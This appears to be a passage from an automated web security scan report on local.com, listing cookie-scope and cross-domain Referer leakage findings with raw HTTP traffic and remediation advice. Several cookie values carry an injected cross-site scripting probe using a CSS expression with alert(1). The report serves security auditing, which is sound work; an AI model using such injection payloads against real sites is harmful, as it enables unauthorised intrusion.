Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:01:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 616

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,

...[SNIP]...

7.43. http://www.local.com/ver1.0/Video/Upload previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Video/Upload

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Video/Upload HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 16:49:49 GMT
Content-Length: 102
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

<script language="javascript">
document.domain = "local.com";
</script>
Error: No video specified

8. Cross-domain Referer leakage previous next
There are 66 instances of this issue:

/business/
/business/results/
/business/v3/js/globalbusiness_3_5.js
/coupons/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dart/
/dialogs/register.aspx
/events/
/results.aspx
/results/
/topics/

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

8.1. http://www.local.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/business/?location=Dallas%2c+TX

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.facebook.com/local.com/
http://www.omniture.com/

Request

Response

8.2. http://www.local.com/business/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/business/results/?keyword=restaurants&location=dallas%2c+tx

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cf.kampyle.com/k_button.js
http://cr0.worthathousandwords.com/1/A4/9D/C48BBF4788DACF520AC4AA0DA3D.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDbqhh%7Bxzzfiw%7Ciywnih%7Chhmqgv7yzenxhlxvs%7E4fxq-uyr%40Jpifwz*%7C%24%60bhz%23%5Ciywnih%7C*kfxCQxv%7Bi%25Gpnvpdft%23%5Bizuf%7Bujr%7Bt
http://cr0.worthathousandwords.com/5/85/F4/18608ABE2247E240982D252C5DF.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDmq4%7Drtsphgo7gvn475%3A8%3E1%3A8%3B%3E4-uyr%40Si%7Bt%25Vl%C2%83%7Eh%27ikvFPhslk%23%3A%24%7Bpu%26Sr%7E%C2%81b%25*%3C7%3D%40
http://cr0.worthathousandwords.com/9/84/EB/4E397718ABD1025D882FA27CA34.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDx%7C%7D1%5DllBlgynE%C2%81vq4fxq-uyr%40Jkhwj%26D%C2%83ys%21Rk%7Brgho%25Lrxh-ejy%40Omuf%25Jlwmuh%25Sh%C2%81mjbs%26Unw%7Bbzxdwx5%21Ikorgppzy%23Osve3%26Grrl%21%7Cowq%24%5Ct%25Zrme%C2%80%2F
http://cr0.worthathousandwords.com/F/72/77/24491BD8C89B2ADFEC94FA01466.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDx%7C%7D1XppwjMd%7Bhlo3irv*%7BuqCRum%7Df%25Md%7Bhlo%2Bjh%7CA%5Eijt%23%C2%82s%7C%28wk%23qiyf1%26%7Cxy.sj%26Ijqpm%7E
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=restaurants
http://us.yhs.search.yahoo.com/if?p=restaurants&partnerid=yhs-if-local1&fr=yhs-if-local1&ei=UTF-8
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.facebook.com/local.com/
http://www.omniture.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 167707
Date: Thu, 03 Feb 2011 16:43:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=restaurants&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=restaurants|Dallas%2c+TX~banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 167707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX restaurants | Find
...[SNIP]...
</div>
                <a omn_key="BS1SEO:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
YGK[4AvTl4hA5E.k3cJ1QN0uALSF.k2HM7kFALSF7iA7uE7iE2CMGA7B.k1FGNJ1yH7yS4QHELLJ1sL7JF7AGKVbA4c*[w4pb4kzqq4mbeS4ks^^!AHQ3FA3E^splrl{2A|5cF.k[2Answ4e.k3PA3EA3Z]6jo4oM1rK1MB2My1LE4R" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/9/84/EB/4E397718ABD1025D882FA27CA34.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDx%7C%7D1%5DllBlgynE%C2%81vq4fxq-uyr%40Jkhwj%26D%C2%83ys%21Rk%7Brgho%25Lrxh-ejy%40Omuf%25Jlwmuh%25Sh%C2%81mjbs%26Unw%7Bbzxdwx5%21Ikorgppzy%23Osve3%26Grrl%21%7Cowq%24%5Ct%25Zrme%C2%80%2F" alt="" />
               </a>
...[SNIP]...
4vGVe3F{1lWl[opy.jbG5uI1yKGM.ks^x3WV_-8kHTn2aw2cw0qA4fwm!4XA4lW6eo4GF4L.kMEMH1NG4MJ1QE0jE4QKHFFE4TJ7xKmto:5Cp3ZS5Fa5x-8XGKm2FY6VT6TN6SL6ZK4cx3KtryYo3ZL6XI6TA4fn9w^[*pB2My1LGKL" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/F/72/77/24491BD8C89B2ADFEC94FA01466.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDx%7C%7D1XppwjMd%7Bhlo3irv*%7BuqCRum%7Df%25Md%7Bhlo%2Bjh%7CA%5Eijt%23%C2%82s%7C%28wk%23qiyf1%26%7Cxy.sj%26Ijqpm%7E" alt="" />
               </a>
...[SNIP]...
[w4ob4jzqq4lbeS4js^^!AHQ3EA3Rw3Gv.klvp2Qz3Nn2aA3D|1Kn3Snv.k2hs,A3Y{3KA6y.k5MGKp6DT3qL0PI3v.jMIMF2xL0JG4lo8zF4YGK!*m4nE7pGKnvA4bNRR0FJLT2YMSS2wJJRSU7oKKIKSKNUM8xK4YH6EB2Ky1LF3v" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/5/85/F4/18608ABE2247E240982D252C5DF.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDmq4%7Drtsphgo7gvn475%3A8%3E1%3A8%3B%3E4-uyr%40Si%7Bt%25Vl%C2%83%7Eh%27ikvFPhslk%23%3A%24%7Bpu%26Sr%7E%C2%81b%25*%3C7%3D%40" alt="" />
               </a>
...[SNIP]...
A7F.kHELL6DG7JL7y.kEA2zVbA4l*[w5jb3Yzqq4AbeS3Ys3z!3VQ3CA3N}1V.k*]ot0bn^z[=1ZzxA3N]6WGVI0FE0TN7sGVtyo2N.ks^8mHVlqt6HHTF3uN4A*^x.u]3T[2uA4l]*!p[3Jr2PA2z*8E.uxp8h*8xTn!nB2Ky1LFHG" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/1/A4/9D/C48BBF4788DACF520AC4AA0DA3D.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDbqhh%7Bxzzfiw%7Ciywnih%7Chhmqgv7yzenxhlxvs%7E4fxq-uyr%40Jpifwz*%7C%24%60bhz%23%5Ciywnih%7C*kfxCQxv%7Bi%25Gpnvpdft%23%5Bizuf%7Bujr%7Bt" alt="" />
               </a>
...[SNIP]...
<div class="mT15" style="clear:both">
<iframe width="500" height="195" frameBorder="no" scrolling="no" src="http://us.yhs.search.yahoo.com/if?p=restaurants&partnerid=yhs-if-local1&fr=yhs-if-local1&ei=UTF-8" id="yhs-if"></iframe>
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="BS1SEO:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Businesses+-+SERP+-+SEO" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=restaurants"></script>
...[SNIP]...

8.3. http://www.local.com/business/v3/js/globalbusiness_3_5.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/v3/js/globalbusiness_3_5.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/business/v3/js/globalbusiness_3_5.js?v=4034_19829

The response contains the following link to another domain:

http://maps.ucla.edu/campus/help/images/i_zoomin.png

Request

Response

8.4. http://www.local.com/coupons/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/coupons/?location=Dallas%2c+TX

The response contains the following links to other domains:

http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/aaronsinc/large/010111_1_SU0C9ZX_pjbi5.jpg
http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/acehardware/large/110201SS_001_C001P1_FkAdg.jpg
http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/albertsons/large/110202_DW_1_v1_GUAdw.jpg
http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/bestbuy/large/020111Movie_1_3h9pr.jpg
http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/compusa/large/110130_CompUSA_MH_SS_Frontcvr_z373z.jpg
http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/toysrus/large/110128_BRU_1_V1_RELEASE_eci8j.jpg
http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1
http://cdn.savings.com/logo/1608646.png
http://cdn.savings.com/logo/2309.gif
http://cdn.savings.com/logo/637068.jpeg
http://cf.kampyle.com/k_button.js
http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/055/16040055.gif
http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/167/16078167.gif
http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/184/16015184.gif
http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3c
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=
http://weather.weatherbug.com/?zip=75201&zcode=6292
http://www.facebook.com/local.com/
http://www.omniture.com/
http://www.savings.com/
http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D126517
http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D169494
http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D169578
http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D170735
http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D183568
http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D193426
http://www.thedealmap.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103070
Date: Thu, 03 Feb 2011 16:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:52 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</script>

<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.3c"></script>
...[SNIP]...
</div>
                <a omn_key="CL:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
<p class="fr txtUP bold txt11" style="margin:5px 25px 0 0">Provided by: <a href="http://www.thedealmap.com/" target="_blank" rel="nofollow">The Dealmap</a>
...[SNIP]...
<a omn_key="CL:125:1:1104" onclick="return loc_click(this);" href="/coupons/online/?keyword=Old Navy&location=Dallas, TX">
<img src="http://cdn.savings.com/logo/2309.gif" />
</a>
...[SNIP]...
<div class="storeImg"><img src="http://cdn.savings.com/logo/2309.gif" /></div>
...[SNIP]...
<div><a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D169578" class="blueLink" target="_blank">Visit store site</a>
...[SNIP]...
<br />

<a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D183568" rel="nofollow" target="_blank"><div class="getDeal" style="position:absolute;bottom:30px;">
...[SNIP]...
<p class="txt11 bold txtUP mB10 mT5" style="position:absolute;bottom:0px">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<a omn_key="CL:125:1:1104" onclick="return loc_click(this);" href="/coupons/online/?keyword=Apple&location=Dallas, TX">
<img src="http://cdn.savings.com/logo/1608646.png" />
</a>
...[SNIP]...
<div class="storeImg"><img src="http://cdn.savings.com/logo/1608646.png" /></div>
...[SNIP]...
<div><a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D170735" class="blueLink" target="_blank">Visit store site</a>
...[SNIP]...
<br />

<a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D126517" rel="nofollow" target="_blank"><div class="getDeal" style="position:absolute;bottom:30px;">
...[SNIP]...
<p class="txt11 bold txtUP mB10 mT5" style="position:absolute;bottom:0px">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<a omn_key="CL:125:1:1104" onclick="return loc_click(this);" href="/coupons/online/?keyword=Drugstore.com&location=Dallas, TX">
<img src="http://cdn.savings.com/logo/637068.jpeg" />
</a>
...[SNIP]...
<div class="storeImg"><img src="http://cdn.savings.com/logo/637068.jpeg" /></div>
...[SNIP]...
<div><a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D169494" class="blueLink" target="_blank">Visit store site</a>
...[SNIP]...
<br />

<a href="http://www.savings.com/mpclick?placementid=11503963&url=http%3A%2F%2Fwww.savings.com%2Fmpofferref%3Fofferid%3D193426" rel="nofollow" target="_blank"><div class="getDeal" style="position:absolute;bottom:30px;">
...[SNIP]...
<p class="txt11 bold txtUP mB10 mT5" style="position:absolute;bottom:0px">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<p class="fr txt11 bold txtUP mB10">Provided by: <a href="http://www.savings.com/" target="_blank" rel="nofollow">Savings.com</a>
...[SNIP]...
<p class="fr txt11 bold txtUP mB10 mT5 ie6hide">Provided by: <a href="http://www.thedealmap.com/" target="_blank" rel="nofollow">The Dealmap</a>
...[SNIP]...
<a href="/coupons/grocery/16040055/" omn_key="CL:127:1:2004" onclick="return loc_click(this);">
    <img src="http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/055/16040055.gif" alt="$0.55 off on VLASIC Pickles, Peppers or Relish" />
    </a>
...[SNIP]...
<a href="/coupons/grocery/16078167/" omn_key="CL:127:1:2004" onclick="return loc_click(this);">
    <img src="http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/167/16078167.gif" alt="$0.75 off JELL-O Pudding or Mousse Snacks 6-packs" />
    </a>
...[SNIP]...
<a href="/coupons/grocery/16015184/" omn_key="CL:127:1:2004" onclick="return loc_click(this);">
    <img src="http://download3.coupons.com/7/19/7125/1450/insight.coupons.com/COS20/_Cache/_ImageCache/184/16015184.gif" alt="$1.00 off 2 JELL-O Gelatin, Pudding or Mousse 6pks" />
    </a>
...[SNIP]...
<a href="/coupons/weekly/aarons-inc/dallas-tx/2615225/aaronsinc-010111/?retailer=Aaron's+Inc" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/aaronsinc/large/010111_1_SU0C9ZX_pjbi5.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/ace-hardware/dallas-tx/2434390/ace-110201ss/?retailer=ACE+Hardware" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/acehardware/large/110201SS_001_C001P1_FkAdg.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/albertsons/dallas-tx/2408168/alb-llc-110202-dw/?retailer=Albertson's" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/albertsons/large/110202_DW_1_v1_GUAdw.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/toys-r-us/dallas-tx/2598804/babiesrus-110128/?retailer=Toys+R+Us" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/toysrus/large/110128_BRU_1_V1_RELEASE_eci8j.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/best-buy/dallas-tx/2490843/020111movie/?retailer=Best+Buy" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/bestbuy/large/020111Movie_1_3h9pr.jpg" alt="" />
</a>
...[SNIP]...
<a href="/coupons/weekly/compusa/dallas-tx/2622575/compusa-110130/?retailer=CompUSA" omn_key="CL:128:1:1104" onclick="return loc_click(this);">
<img src="http://akimages.shoplocal.com/dyn_rppi/140.0.90.0/compusa/large/110130_CompUSA_MH_SS_Frontcvr_z373z.jpg" alt="" />
</a>
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="CL:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Coupons+-+Landing" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw="></script>
...[SNIP]...

8.5. http://www.local.com/dart/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The page was loaded from a URL containing a query string:

http://www.local.com/dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748882748&k=banks&l=Dallas%2c+TX

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748882748?
http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=1;tile=1;city=dallas_tx;sz=728x90;ord=1296748882748?

Request

GET /dart/?ag=True&css=banner&p=locm.pp&pos=1&t=1&sz=728x90&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
